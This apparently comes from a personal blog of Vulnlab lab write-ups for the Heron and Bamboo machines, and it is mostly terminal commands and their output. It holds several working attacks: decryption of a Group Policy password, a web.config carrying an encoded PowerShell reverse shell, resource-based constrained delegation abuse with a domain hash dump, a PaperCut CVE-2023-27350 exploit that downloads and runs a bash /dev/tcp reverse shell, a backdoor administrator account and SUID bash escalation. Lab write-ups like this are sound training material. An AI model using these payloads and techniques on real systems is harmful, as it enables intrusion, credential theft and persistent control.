  .                                   D        0  Sun May 26 11:38:59 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  DfsrPrivate                      DHSr        0  Sun May 26 11:38:59 2024
  Policies                            D        0  Tue Jun  4 17:57:41 2024
  scripts                             D        0  Sun Jun  2 12:42:56 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Sun May 26 11:38:59 2024
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sun May 26 11:37:44 2024
  {3FFDA928-A6D1-4860-936F-25D9D2D7EAEF}      D        0  Sun May 26 12:21:54 2024
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sun May 26 11:37:44 2024
  {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}      D        0  Tue Jun  4 17:57:41 2024
  {866ECED1-24B0-46EF-92F5-652345A1820C}      D        0  Sun May 26 12:23:29 2024

        6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  GPT.INI                             A       59  Tue Jun  4 18:00:13 2024
  Machine                             D        0  Tue Jun  4 17:59:44 2024
  User                                D        0  Tue Jun  4 17:57:41 2024

        6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  Preferences                         D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups                              D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups.xml                          A     1135  Tue Jun  4 18:01:07 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> 

Gppencrypt pw [

pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py 

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$

with the H3<redacted>#! pass , valid for user svc-web-accounting-d , we can access SMB

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  7 08:14:04 2024
  ..                                DHS        0  Sun Jun  2 17:26:14 2024
  AccountingApp.deps.json             A    37407  Sun Jun  2 21:25:26 2024
  AccountingApp.dll                   A    89600  Sun Jun  2 21:25:26 2024
  AccountingApp.exe                   A   140800  Sun Jun  2 21:25:26 2024
  AccountingApp.pdb                   A    39488  Sun Jun  2 21:25:26 2024
  AccountingApp.runtimeconfig.json      A      557  Sun Jun  2 00:22:20 2024
  appsettings.Development.json        A      127  Sun Jun  2 00:00:54 2024
  appsettings.json                    A      237  Sun Jun  2 00:03:50 2024
  FinanceApp.db                       A   106496  Sat Jun  1 16:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 10:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll      A    52912  Mon May 20 14:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll      A    23712  Mon May 20 14:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll      A   108808  Mon May 20 14:24:24 2024
  Microsoft.Data.Sqlite.dll           A   172992  Mon May 20 09:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll      A    34848  Mon May 20 09:54:30 2024
  Microsoft.EntityFrameworkCore.dll      A  2533312  Mon May 20 09:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll      A  1991616  Mon May 20 09:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll      A   257456  Mon May 20 09:55:30 2024
  Microsoft.Extensions.DependencyModel.dll      A    79624  Tue Oct 31 23:59:24 2023
  Microsoft.Extensions.Identity.Core.dll      A   177840  Mon May 20 14:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll      A    45232  Mon May 20 14:24:20 2024
  Microsoft.Extensions.Options.dll      A    64776  Thu Jan 18 12:05:26 2024
  runtimes                            D        0  Sat Jun  1 16:51:32 2024
  SQLitePCLRaw.batteries_v2.dll       A     5120  Thu Aug 24 04:41:24 2023
  SQLitePCLRaw.core.dll               A    50688  Thu Aug 24 04:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll      A    35840  Thu Aug 24 04:38:52 2023
  System.DirectoryServices.Protocols.dll      A    71944  Wed Nov  1 00:00:24 2023
  web.config                          A      554  Thu Jun  6 16:41:39 2024
  wwwroot                             D        0  Sat Jun  1 16:51:32 2024

        6261499 blocks of size 4096. 1957663 blocks available
smb: \> 

.

We remove web.config, and then upload a modified web.config

i used this one

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
    <system.webServer>
    <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
    </handlers>
    <aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" />
    </system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Then i did a proxychains Firefox to http://accounting.heron.vl

logged in as svc-web-accounting-d with the H3<redacted>#!  pasword, and then visited http://accounting.heron.vl/execute.now to trigger

or do a curl like this

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  accounting.heron.vl:80  ...  OK

 

and catched the rev shell back to my kali box

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001                
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560

PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir


    Directory: C:\windows\scripts


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/6/2024   7:12 AM           1416 dns.ps1                                                              
-a----          6/1/2024   8:26 AM            221 ssh.ps1                                                              


PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>                      

checked Defender is running Get-MpComputerStatus on MUCDC, killing session after about 1 min, so visited http://accounting.heron.vl/execute.now again if ya need more time…

privesc on ubuntu box

pentest@frajmp:/tmp$ su _local
Password: 
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt  snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}

transfer /etc/krb5.keytab with nc to kali box, and do a keytabextract.py

──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab           
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : HERON.VL
    SERVICE PRINCIPAL : FRAJMP$/
    NTLM HASH : 6f<redacted>f7
    AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
    AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd

We do some more Enumeration …finding Depl<redacted>Dealt working for julian.pratt

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 12:47:14 2024
  ..                                  D        0  Sat Jun  1 17:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 12:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 17:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 17:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 12:47:33 2024

        6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\> 

.

From bloodhoud, We find adm_prju is within the ADMINS_T1 group, they have the WriteAccountRestrictions privilege over MUCDC.

Having WriteAccountRestrictions means that adm_prju has write access to all of the attributes on the machine, notably msDS-AllowedToActOnBehalfOfOtherIdentity. If we have the ability to modify this attribute,  we can abuse resource-based constrained delegation

Next do the RBCD ( Role Based Constrained Delegation )

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4' 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:389  ...  OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)

Get the ticket

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache        

and do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-secretsdump -k mucdc.heron.vl 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3
HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216
dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19
[*] NL$KM 
 0000   5C A7 E2 A0 9A 0F 0E A7  0A 6F 35 33 21 07 83 01   \........o53!...
 0010   93 8A 8A 6D 21 3B C2 CA  60 E6 E6 B6 5A 22 04 A2   ...m!;..`...Z"..
 0020   D1 F4 93 69 36 20 AF BB  F7 38 31 3A BE E5 D5 29   ...i6 ...81:...)
 0030   55 5E 2B 54 ED A4 1B 52  03 FD 77 75 AC F2 9A 58   U^+T...R..wu...X
NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:49667  ...  OK
_admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::

Get the  flag’s

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Jun  6 17:01:47 2024
  --snip--
  System Volume Information         DHS        0  Sun May 26 11:48:42 2024
  transfer                            D        0  Sun May 26 13:51:27 2024
  Users                              DR        0  Sat Jun  1 17:43:04 2024
  webaccounting                       D        0  Fri Jun  7 08:14:04 2024
  Windows                             D        0  Sun Jun  2 17:26:03 2024

        6261499 blocks of size 4096. 1962809 blocks available

Beyond root

proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
 -> RDP in to MUCDC not allowed


┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:49669  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin

C:\>net user /add puck Password123!
The command completed successfully.


C:\>net localgroup Administrators puck /add[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK

The command completed successfully.


$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389


---
C:\Users\puck>net user adm_hoka
User name                    adm_hoka
Full Name                    adm_hoka
Comment                      t0
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2024 4:50:28 AM
Password expires             Never
Password changeable          5/27/2024 4:50:28 AM
Password required            Yes
User may change password     Yes

Workstations allowed         admjmp_t0
Logon script                 \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory               \\mucdc.heron.vl\home$\adm_hoka
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *admins_t0
The command completed successfully.

---
logon.vbs contains
Option Explicit

Dim objShell, bgInfoPath, bgInfoConfigPath

Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing


 

This chain was really fun 🙂

vulnlab-bamboo

vulnlab bamboo

nmap scan

# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http

# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds

squidscan

┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan                     
Port 22 found!
8916 / 65535 [------->____________________________________________] 13.60% 1659 p/sPort 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
9707 / 65535 [------->____________________________________________] 14.81% 1678 p/sPort 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s

 

modified /etc/proxychains

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128

.

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
< 
* Connection #0 to host 10.10.79.83 left intact

Exploiting CVE-2023-27350

wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py

 

1st

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

2nd

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" 
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

s.sh contains:

#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1

 

catch the shell

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ 
zsh: suspended  rlwrap nc -nlvp 9001
                                                                                                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$ 

Let’s add our key to the authorized_keys file, to get a SSH shell

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$

we now do linpeas and pspy stuff on bamboo

ssh -i papercut papercut@10.10.79.83

 

privesc

There is an authentication bypass script in exploitdb https://www.exploit-db.com/exploits/51391 which is the same CVE as the one we started
We run it as follows and it will output what we need to do.

➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

The PaperCut NG instance running on port 9191 so let’s forward that port via SSH

papercut papercut@10.10.29.83 -L 9191:127.0.0.1:9191 -N

Browse to papercut

Click refresh servers to trigger the server-command

.

papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$ 

papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$ 
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash -p
bash-5.1# cd /rocd /root
cd /root
bash-5.1# ls    ls
ls
root.txt  snap
bash-5.1# cat rocat root.txt
cat root.txt
VL{48<redacted>26}
bash-5.1# 

That’s all.

 

 

vulnlab-lustrous

vulnlab lustrous

